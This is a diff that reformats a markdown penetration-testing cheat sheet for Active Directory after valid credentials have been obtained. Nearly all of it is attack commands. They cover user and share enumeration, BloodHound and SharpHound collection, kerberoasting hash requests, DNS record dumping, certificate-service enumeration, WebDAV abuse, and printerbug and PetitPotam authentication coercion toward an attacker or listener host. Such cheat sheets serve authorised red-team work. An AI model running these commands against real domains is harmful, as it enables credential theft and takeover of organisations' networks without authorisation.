--- a/04. Valid_credentials.md
+++ b/04. Valid_credentials.md
@@ -1,20 +1,27 @@
-### Got valid credentials
-Get all users
+# Got valid credentials
+
+## Get all users
 	GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
 	cme smb <ip> -u <user> -p '<password>' --users 
 	Users
-enumerate SMB share
+
+## enumerate SMB share
 	cme smb <ip> -u <user> -p <password> --shares
 	Account
-🔥bloodhound
+
+## 🔥bloodhound
 	bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
 	./rusthound -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile> -z
 	import-module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain <domain>
 	sharphound.exe -c all -d <domain>
-Powerview / SharpView
-adPeas
-pingcastle
-🔥kerberoasting
+
+## Powerview / SharpView
+
+## adPeas
+
+## pingcastle
+
+## 🔥kerberoasting
 	Get kerberoastable users
 		Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
 		MATCH (u:User {hasspn:true}) RETURN u
@@ -23,19 +30,19 @@ pingcastle
 		GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
 		Rubeus kerberoast
 		
-		
-Enum dns 
+## Enum dns 
 	dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query <dc_ip>
 	Scan network
-Enumerate AD CS 
+
+## Enumerate AD CS 
 	 🔥 certipy find -u <user>@<domain> -p <password> -dc-ip <domaincontroller>
 	
-Webdav
+## Webdav
 	cme smb <ip> -u <user> -p <password> -M webdav #find
 	start webdav with Documents.searchConnector-ms file
 	coerce with <attacker_hostname>@80/something as target
 
-Coerce
+## Coerce
 	rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN
 	printerbug.py '<domain>/<username>:<password>'@<Printer IP> <listener_ip>
 	PetitPotam.py  -d <domain> -u <user>-p <password> <listener_ip> <target_ip>
